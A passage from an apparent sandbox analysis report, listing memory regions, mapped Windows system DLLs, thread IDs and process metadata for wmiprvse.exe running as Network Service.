"sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1775 start_va = 0x7fefd1e0000 end_va = 0x7fefd201fff monitored = 0 entry_point = 0x7fefd1e5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1776 start_va = 0x7fefd260000 end_va = 0x7fefd28efff monitored = 0 entry_point = 0x7fefd261064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1777 start_va = 0x7fefd2a0000 end_va = 0x7fefd30cfff monitored = 0 entry_point = 0x7fefd2a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1778 start_va = 0x7fefd310000 end_va = 0x7fefd323fff monitored = 0 entry_point = 0x7fefd314160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1779 start_va = 0x7fefd570000 end_va = 0x7fefd592fff monitored = 0 entry_point = 0x7fefd571198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1780 start_va = 0x7fefd610000 end_va = 0x7fefd61afff monitored = 0 entry_point = 0x7fefd611030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1781 start_va = 0x7fefd640000 end_va = 0x7fefd664fff monitored = 0 entry_point = 0x7fefd649658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1782 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1783 start_va = 0x7fefd680000 end_va = 0x7fefd710fff monitored = 0 entry_point = 0x7fefd681440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1784 start_va = 0x7fefd720000 end_va = 0x7fefd75cfff monitored = 0 entry_point = 0x7fefd7218f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1785 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1786 start_va = 0x7fefd780000 end_va = 0x7fefd78efff monitored = 0 entry_point = 0x7fefd7819b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1787 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1788 start_va = 0x7fefd830000 end_va = 0x7fefd86afff monitored = 0 entry_point = 0x7fefd831324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1789 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1790 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1791 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1792 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1793 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1794 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1795 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1796 start_va = 0x7fefe070000 end_va = 0x7fefedf7fff monitored = 0 entry_point = 0x7fefe0ecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1797 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1798 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1799 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1800 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1801 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1802 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1803 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1804 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1805 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1806 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1807 start_va = 0x7feff970000 end_va = 0x7feff9bcfff monitored = 0 entry_point = 0x7feff971070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1808 start_va = 0x7feff9c0000 end_va = 0x7feff9c7fff monitored = 0 entry_point = 0x7feff9c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1809 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1810 start_va = 0x7feffae0000 end_va = 0x7feffb31fff monitored = 0 entry_point = 0x7feffae10d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1811 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1812 start_va = 0x7fffff46000 end_va = 0x7fffff47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff46000" filename = "" Region: id = 1813 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 1814 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 1815 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 1816 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 1817 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1818 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1819 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1820 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 1821 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1822 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1823 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1824 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1825 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1826 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1827 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1828 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1829 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1830 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1831 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1832 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1833 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1834 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1835 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1836 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1837 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1838 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1839 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1840 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1841 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1842 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1843 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1844 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1845 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1846 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1847 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1852 start_va = 0x2460000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 1853 start_va = 0x3150000 end_va = 0x31cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1854 start_va = 0x31d0000 end_va = 0x324ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 1855 start_va = 0x3670000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 1856 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1857 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1858 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1859 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2677 start_va = 0x3750000 end_va = 0x37cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 2678 start_va = 0x3b40000 end_va = 0x3bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 2679 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2680 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2685 start_va = 0x2490000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Thread: id = 48 os_tid = 0xc98 Thread: id = 49 os_tid = 0xc6c Thread: id = 50 os_tid = 0xf08 Thread: id = 51 os_tid = 0xe44 Thread: id = 52 os_tid = 0xe40 Thread: id = 53 os_tid = 0x87c Thread: id = 54 os_tid = 0x878 Thread: id = 55 os_tid = 0x86c Thread: id = 56 os_tid = 0x448 Thread: id = 57 os_tid = 0x798 Thread: id = 58 os_tid = 0x5c0 Thread: id = 59 os_tid = 0x234 Thread: id = 60 os_tid = 0x118 Thread: id = 61 os_tid = 0x210 Thread: id = 62 os_tid = 0x274 Thread: id = 63 os_tid = 0x52c Thread: id = 64 os_tid = 0x660 Thread: id = 65 os_tid = 0x628 Thread: id = 66 os_tid = 0x60c Thread: id = 67 os_tid = 0x600 Thread: id = 68 os_tid = 0x5f0 Thread: id = 69 os_tid = 0x460 Thread: id = 70 os_tid = 0x45c Thread: id = 71 os_tid = 0x404 Thread: id = 72 os_tid = 0x128 Thread: id = 73 os_tid = 0x458 Thread: id = 74 os_tid = 0x454 Thread: id = 75 os_tid = 0x44c Thread: id = 76 os_tid = 0x21c Thread: id = 77 os_tid = 0x3f8 Thread: id = 78 os_tid = 0x3f0 Thread: id = 79 os_tid = 0x3e4 Thread: id = 80 os_tid = 0x378 Thread: id = 81 os_tid = 0x370 Thread: id = 98 os_tid = 0xd18 Thread: id = 99 os_tid = 0xd28 Thread: id = 100 os_tid = 0xd30 Thread: id = 101 os_tid = 0xd2c Thread: id = 102 os_tid = 0xd24 Thread: id = 103 os_tid = 0xd04 Thread: id = 160 os_tid = 0xab8 Process: id = "9" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x4dd7a000" os_pid = "0xc1c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0004cd1a" [0xc000000f] Region: id = 1860 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1861 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1862 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1863 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1864 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1865 start_va = 0xc0000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1866 start_va = 0x180000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1867 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1868 start_va = 0x210000 end_va = 0x214fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1869 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1870 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1871 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1872 start_va = 0x250000 end_va = 0x25cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1873 start_va = 0x280000 end_va = 0x282fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1874 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1875 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1876 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1877 start_va = 0x5e0000 end_va = 0x767fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1878 start_va = 0x770000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1879 start_va = 0x900000 end_va = 0xbcefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1880 start_va = 0xc00000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1881 start_va = 0xcb0000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 1882 start_va = 0xd60000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 1883 start_va = 0xec0000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 1884 start_va = 0xf90000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1885 start_va = 0x1010000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 1886 start_va = 0x10c0000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 1887 start_va = 0x1140000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 1888 start_va = 0x72d00000 end_va = 0x72d02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1889 start_va = 0x72d10000 end_va = 0x72d12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 1890 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1891 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1892 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1893 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1894 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1895 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1896 start_va = 0x13f7d0000 end_va = 0x13f83bfff monitored = 0 entry_point = 0x13f80b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1897 start_va = 0x7fef28d0000 end_va = 0x7fef28d7fff monitored = 0 entry_point = 0x7fef28d11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1898 start_va = 0x7fef2960000 end_va = 0x7fef2971fff monitored = 0 entry_point = 0x7fef296aab8 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1899 start_va = 0x7fef2980000 end_va = 0x7fef2b79fff monitored = 1 entry_point = 0x7fef2994c9c region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1900 start_va = 0x7fef3250000 end_va = 0x7fef3259fff monitored = 0 entry_point = 0x7fef32531c8 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1901 start_va = 0x7fef6cf0000 end_va = 0x7fef6d1bfff monitored = 0 entry_point = 0x7fef6d08194 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 1902 start_va = 0x7fef7780000 end_va = 0x7fef77c2fff monitored = 0 entry_point = 0x7fef77a1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1903 start_va = 0x7fef95c0000 end_va = 0x7fef95d1fff monitored = 0 entry_point = 0x7fef95c89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1904 start_va = 0x7fef9780000 end_va = 0x7fef97a0fff monitored = 0 entry_point = 0x7fef97903b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1905 start_va = 0x7fef98a0000 end_va = 0x7fef98b2fff monitored = 0 entry_point = 0x7fef98a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1906 start_va = 0x7fef9b80000 end_va = 0x7fef9b8dfff monitored = 0 entry_point = 0x7fef9b85500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1907 start_va = 0x7fef9b90000 end_va = 0x7fef9bb6fff monitored = 0 entry_point = 0x7fef9b911a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1908 start_va = 0x7fef9bc0000 end_va = 0x7fef9c92fff monitored = 0 entry_point = 0x7fef9c38b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1909 start_va = 0x7fef9e20000 